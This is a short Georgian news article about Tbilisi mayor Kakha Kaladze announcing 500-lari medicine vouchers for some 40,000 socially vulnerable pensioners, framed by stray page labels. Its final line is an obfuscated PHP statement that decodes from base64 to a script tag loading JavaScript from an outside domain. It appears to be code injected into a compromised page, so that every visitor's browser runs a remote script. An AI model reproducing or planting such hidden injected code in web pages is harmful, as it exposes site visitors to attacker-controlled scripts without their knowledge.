celsiusi
ავერსი საქკაბელი
ახალი პროგრამის მიხედვით, სოციალურად დაუცველი პენსიონერები 500-ლარიან ვაუჩერებს მიიღებენ, რათა ოჯახის ექიმის მიერ დანიშნული სხვადასხვა მედიკამენტის შეძენა შეძლონ, - ამის შესახებ თბილისის მერმა, კახა კალაძემ დედაქალაქის მთავრობის სხდომაზე განაცხადა.
 
მისი თქმით, ვაუჩერი ისეთ მედიკამენტებს შეეხება, რომელიც გულ-სისხლძარღვთა, ქრონიკული დაავადებების მკურნალობას ესაჭიროება. ასევე, პროგრამის მიზანი იქნება ტკივილგამაყუჩებელი წამლების შესაძენად პენსიონერთა დახმარება.
 
„ეს მხარდაჭერა ბიუჯეტს დაახლოებით 20 მილიონი ლარი დაუჯდება. ამ პროგრამით 40 000 სოციალურად დაუცველი პენსიონერი ისარგებლებს. ბოლო 4 წლის განმავლობაში თბილისელთა 2 000 000-მდე მოთხოვნა დახმარებაზე იქნა დაკმაყოფილებული სხვადასხვა მიმართულებით და ყოველთვის ვიქნებით იმ ოჯახების და ადამიანების გვერდით, ვისაც ჯერ კიდევ სჭირდება დახმარება და თანადგომა“, - განაცხადა კახა კალაძემ.
1123
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");